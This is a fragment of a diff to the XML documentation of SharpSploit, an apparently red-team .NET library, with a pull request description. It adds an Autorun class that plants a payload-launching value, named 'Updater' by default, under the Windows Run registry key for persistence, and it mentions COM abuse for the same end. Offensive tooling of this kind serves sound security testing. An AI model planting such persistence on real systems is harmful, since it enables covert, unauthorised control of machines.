+            Creates an autorun value in HKCU or HKLM to execuate a payload.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if execution succeeds, false otherwise.</returns>
+            <param name="Name">Name for the registy value. Defaults to "Updater".</param>
+            <param name="Value">The registry value.</param>
+            <param name="TargetHive">The target hive. HKCU or HKLM.</param>
+        </member>
         <member name="T:SharpSploit.Persistence.COM">
             <summary>
             COM is a class for abusing the Microsoft Component Object Model to establish peristence.


### PR DESCRIPTION
Created `SharpSploit.Persistence.Autorun` - a class for abusing the Windows Registry to establish peristence.

It simply drops a new `ExpandedString` Registry Value into `Software\Microsoft\Windows\CurrentVersion\Run`, in either `HKCU` or `HKLM`.

Two Unit Tests are included for testing the addition of Values in `HKCU` and `HKLM`.

> Note: I had to upgrade the MSTest NuGet packages to 1.4.0 for them to run on my machine.

![AutorunTests](https://user-images.githubusercontent.com/7346521/58763901-e3625780-8558-11e9-937d-8abc8d263c6a.PNG)

Any feedback, alterations, suggestions etc are welcome.